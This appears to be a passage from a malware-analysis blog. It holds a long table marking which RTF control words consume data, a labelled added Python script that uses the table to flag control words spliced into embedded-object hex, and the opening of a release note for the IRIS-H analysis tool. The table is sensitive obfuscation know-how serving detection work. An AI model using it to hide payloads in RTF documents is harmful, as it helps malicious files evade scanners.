<th scope="row">shpbymargin</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">shpbypage</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">shpbypara</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">shpgrp</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">shpinst</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">shplockanchor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">shppict</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">shprslt</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">shptxt</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">slocked</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sn</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">snaptogridincell</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">softcol</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">softline</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">softpage</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sp</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">spersonal</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">spltpgpar</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">splytwnine</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sprsbsp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sprslnsp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sprsspbf</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sprstsm</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sprstsp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">spv</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sqformat</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sreply</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">staticval</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">stylelock</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">stylelockbackcomp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">stylelockenforced</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">stylelockqfset</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">stylelocktheme</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">stylesheet</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">sub</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">subfontbysize</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">subject</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">super</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sv</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">svb</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">swpbdr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tabsnoovrlp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">taprtl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tbllkbestfit</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tbllkborder</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tbllkcolor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tbllkfont</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tbllkhdrcols</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tbllkhdrrows</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tbllklastcol</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tbllklastrow</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tbllknocolband</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tbllknorowband</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tbllkshading</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tc</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">tcelld</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tcn</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">template</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">themedata</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">time</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">title</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">titlepg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tldot</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tleq</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">tlhyph</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tlmdot</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tlth</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tlul</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">toplinepunct</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tphcol</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tphmrg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tphpg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tposxc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tposxi</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tposxl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tposxo</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tposxr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tposyb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tposyc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tposyil</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tposyin</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tposyout</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tposyt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tpvmrg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tpvpara</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tpvpg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tqc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tqdec</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tqr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">transmf</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbgbdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbgcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbgdcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbgdkbdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbgdkcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbgdkdcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbgdkfdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbgdkhor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbgdkvert</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbgfdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbghoriz</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbgvert</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbrdrb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbrdrh</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbrdrl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbrdrr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbrdrt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trbrdrv</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trhdr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trkeep</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trkeepfollow</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trowd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trqc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trql</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">trqr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">truncatefontheight</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">truncex</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbgbdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbgcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbgdcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbgdkbdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbgdkcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbgdkdcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbgdkfdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbgdkhor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbgdkvert</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbgfdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbghoriz</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbgvert</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbrdrb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbrdrdgl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbrdrdgr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbrdrh</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbrdrl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbrdrr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbrdrt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsbrdrv</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tscbandhorzeven</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tscbandhorzodd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tscbandverteven</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tscbandvertodd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tscfirstcol</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tscfirstrow</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsclastcol</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsclastrow</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tscnecell</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tscnwcell</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tscsecell</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tscswcell</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsnowrap</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsrowd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsvertalb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsvertalc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">tsvertalt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">twoonone</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">txbxtwalways</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">txbxtwfirst</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">txbxtwfirstlast</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">txbxtwlast</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">txbxtwno</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">txe</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ud</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">uld</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ulnone</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ulw</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">upr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">useltbaln</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">usenormstyforlist</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">userprops</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">usexform</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">utinl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">vertal</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">vertalb</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">vertalc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">vertalj</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">vertalt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">vertdoc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">vertsect</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">viewnobound</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">webhidden</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">wgrffmtfilter</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">widctlpar</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">widowctrl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">windowcaption</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">wpeqn</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">wpjst</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">wpsp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">wraparound</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">wrapdefault</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">wrapthrough</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">wraptight</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">wraptrsp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">writereservation</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">writereservhash</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">wrppunct</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">xe</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">xform</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">xmlattr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">xmlattrname</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">xmlattrvalue</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">xmlclose</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">xmlname</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">xmlnstbl</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">xmlopen</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">xmlsdttcell</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">xmlsdttpara</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">xmlsdttregular</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">xmlsdttrow</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">xmlsdttunknown</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">yxe</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
</tbody>
</table>
</div>
</div>
<br>
</div>
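<div>
The table above is most useful as data. The Python below is an added example, not code from the original post: it parses rows written in the table's own markup (a constructed excerpt of six rows copied from above; the page's column headings are not reproduced here, so the two columns are treated as two independent test results) and then uses the result to audit a constructed RTF sample, listing every control word that appears inside an <code>\objdata</code> group together with what the table says about it. Any control word spliced into objdata hex is an anomaly worth flagging on its own; the tag only reports whether the table marks the data after it as swallowed ('consumes') or left in place ('passes'). The consumption behaviour itself is not emulated. Python 3.8 or newer is assumed.
</div>

```python
"""Turn the control-word table into data and audit an RTF sample with it."""
import re
from html.parser import HTMLParser

# Constructed excerpt: six rows copied from the table above, in the page's own markup.
TABLE_HTML = """
<table id="controlWordTable"><tbody>
<tr><th scope="row">txe</th><td class="consumer">Consumes data</td><td class="consumer">Consumes data</td></tr>
<tr><th scope="row">ud</th><td class="consumer">Consumes data</td><td class="consumer">Consumes data</td></tr>
<tr><th scope="row">uld</th><td>Does not consume data</td><td>Does not consume data</td></tr>
<tr><th scope="row">vertalb</th><td>Does not consume data</td><td class="consumer">Consumes data</td></tr>
<tr><th scope="row">widctlpar</th><td>Does not consume data</td><td>Does not consume data</td></tr>
<tr><th scope="row">xe</th><td class="consumer">Consumes data</td><td class="consumer">Consumes data</td></tr>
</tbody></table>
"""


class ControlWordTableParser(HTMLParser):
    """Collect {control word: (column1 consumes?, column2 consumes?)} from the table rows."""

    def __init__(self):
        super().__init__()
        self.rows = {}
        self._word = None
        self._flags = []
        self._cell = None   # 'th' or 'td' while inside a cell
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "tr":
            self._word, self._flags = None, []
        elif tag in ("th", "td"):
            self._cell, self._buf = tag, []

    def handle_data(self, data):
        if self._cell:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag in ("th", "td") and self._cell:
            text = "".join(self._buf).strip()
            if tag == "th":
                self._word = text
            else:
                self._flags.append(text.lower().startswith("consumes"))
            self._cell = None
        elif tag == "tr" and self._word:
            self.rows[self._word] = tuple(self._flags)


def load_table(html):
    parser = ControlWordTableParser()
    parser.feed(html)
    return parser.rows


def consumer_words(table):
    """Control words marked 'Consumes data' in every column."""
    return {w for w, flags in table.items() if flags and all(flags)}


def inconsistent_words(table):
    """Control words whose columns disagree (vertalb above): re-test these per target parser."""
    return {w for w, flags in table.items() if len(set(flags)) > 1}


def objdata_groups(rtf):
    """Yield the body of each \\objdata group, from the control word to its closing brace."""
    i = 0
    while (start := rtf.find("\\objdata", i)) >= 0:
        depth, j = 0, start
        while j < len(rtf):
            c = rtf[j]
            if c == "\\":          # skip control symbols and escaped braces (\{ and \})
                j += 2
                continue
            if c == "{":
                depth += 1
            elif c == "}":
                if depth == 0:
                    break
                depth -= 1
            j += 1
        yield rtf[start + len("\\objdata"):j]
        i = j


CONTROL_WORD = re.compile(r"\\([A-Za-z]+)-?\d* ?")


def audit_objdata(rtf, table):
    """List control words found inside \\objdata hex, tagged by what the table says about them."""
    findings = []
    for body in objdata_groups(rtf):
        for m in CONTROL_WORD.finditer(body):
            word = m.group(1)
            flags = table.get(word)
            if flags is None:
                status = "unknown"
            elif all(flags):
                status = "consumes"
            elif not any(flags):
                status = "passes"
            else:
                status = "inconsistent"
            findings.append((word, status))
    return findings


# Constructed sample: an embedded object whose hex stream has control words spliced into it.
SAMPLE_RTF = r"{\rtf1{\object\objemb{\*\objdata 0105000002000000\widctlpar 0a00\vertalb 1b00\xe 0000}}}"

if __name__ == "__main__":
    table = load_table(TABLE_HTML)
    print("consume in both columns:", sorted(consumer_words(table)))
    print("columns disagree:", sorted(inconsistent_words(table)))
    for word, status in audit_objdata(SAMPLE_RTF, table):
        print(f"\\{word} inside objdata: {status}")
```

<div>
Feeding the full table from this post to <code>load_table</code> gives the complete classification; <code>inconsistent_words</code> is the list to re-test when a new parser or Word build is in scope, since those are the words whose behaviour already differs between the two columns.
</div>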
</div>
<b style="background-color: white; color: #3d85c6; font-size: x-large;"><span style="font-family: "trebuchet ms" , sans-serif;">IRIS-H: Alpha is dead! Long live Beta.</span></b><br />
<span style="font-family: "trebuchet ms" , sans-serif;">Denis O'Brien, 2018-08-12</span><br />
<br />
<b style="background-color: white; color: #3d85c6; font-size: x-large;"><span style="font-family: "trebuchet ms" , sans-serif;">Quick Summary</span></b><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><b style="background-color: white; color: #3d85c6; font-size: x-large;"><br /></b><span style="background-color: white; color: #666666; font-size: 13px;"></span><b style="background-color: white; color: #666666; font-size: 13px;">Build Version</b><span style="background-color: white; color: #666666; font-size: 13px;">: 0.2.0 (beta)</span></span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><b style="background-color: white; color: #666666; font-size: 13px;">Change Type</b><span style="background-color: white; color: #666666; font-size: 13px;">: new version release</span></span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><b style="background-color: white; color: #666666; font-size: 13px;">Affected Components</b><span style="background-color: white; color: #666666; font-size: 13px;">: API, UI</span></span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><b style="background-color: white; color: #666666; font-size: 13px;">Short Description</b><span style="background-color: white; color: #666666; font-size: 13px;">: New version includes:</span></span><br />
<br />
<ul>
<li><span style="font-family: "trebuchet ms" , sans-serif;">(new) complete re-write of the UI 'look & feel'</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">(new) Yara rules support</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">(new) personal service accounts</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">(new) 'Workbench' data view (see Detailed Summary section for description)</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">(new) 'External Intelligence' section added to the 'Report' data view</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">(new) public GitHub repository for issues tracking and feedback</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">API backend data handling infrastructure changes</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">static analysis data extraction routines improvements</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">bug fixes</span></li>
</ul>
<br />
<span style="font-family: "trebuchet ms" , sans-serif;"><b style="background-color: white; color: #666666; font-size: 13px;">Outstanding Tasks</b><span style="background-color: white; color: #666666; font-size: 13px;">: Attach external intelligence feeds, minor cosmetic UI fixes, further data parser improvements.</span></span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , sans-serif; font-size: 13px;"><b>Known Issues</b>: Minor cosmetic glitches in the UI.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><span style="background-color: white; color: #666666; font-size: 13px;"><br /></span><span style="background-color: white; color: #666666; font-size: 13px;"></span><b style="background-color: white; color: #3d85c6; font-size: x-large;">Detailed Summary</b></span><br />
<b style="background-color: white; color: #3d85c6; font-size: x-large;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></b>
<span style="font-family: "trebuchet ms" , sans-serif;"><u style="font-weight: bold;"><span style="color: #3d85c6;">Disclaimer:</span></u> All the functionality descriptions and screenshot examples given below reflect the application state at release time. Some features and the interface 'look & feel' might change in follow-up releases.</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , sans-serif; font-size: 13px;"><br /></span>
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , sans-serif; font-size: 13px;">Sections below describe some of the major features/changes implemented in this release.</span><br />
